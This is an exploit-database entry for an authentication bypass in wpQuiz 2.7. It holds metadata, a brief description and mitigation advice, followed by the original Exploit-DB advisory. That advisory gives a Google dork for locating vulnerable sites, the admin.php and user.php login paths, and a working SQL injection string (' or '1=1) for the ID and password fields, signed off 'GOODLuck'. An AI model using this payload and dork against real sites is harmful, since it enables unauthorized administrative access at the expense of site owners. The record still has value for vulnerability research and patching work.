header-logo
Suggest Exploit
vendor:
wpQuiz
by:
KnocKout
7,5
CVSS
HIGH
Auth bypass
287
CWE
Product Name: wpQuiz
Affected Version From: 2.7
Affected Version To: 2.7
Patch Exists: YES
Related CWE: N/A
CPE: a:wpquiz:wpquiz:2.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Auth bypass Vulnerability

wpQuiz version 2.7 is vulnerable to an authentication bypass vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The request should contain an ID and PW parameter set to ' or '1=1. This will bypass the authentication and allow the attacker to access the application.

Mitigation:

Upgrade to the latest version of wpQuiz or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

Powered by wpQuiz - Auth bypass Vulnerability

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout 
[+] Greatz : DaiMon 
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Script : wpQuiz
~Version : 2.7
~Download : http://webscripts.softpedia.com/script/Quizz/wpQuiz-41098.html
~Vulnerability Style : Auth bypass
~Google Dork : "Powered by wpQuiz" inurl:index.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation ~~~~~~~~~~~

http://[Victim]/path/admin.php 
                     [or user.php]

for bypass() bySQL

ID : ' or '1=1
PW : ' or '1=1

              GOODLuck ;)
              
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~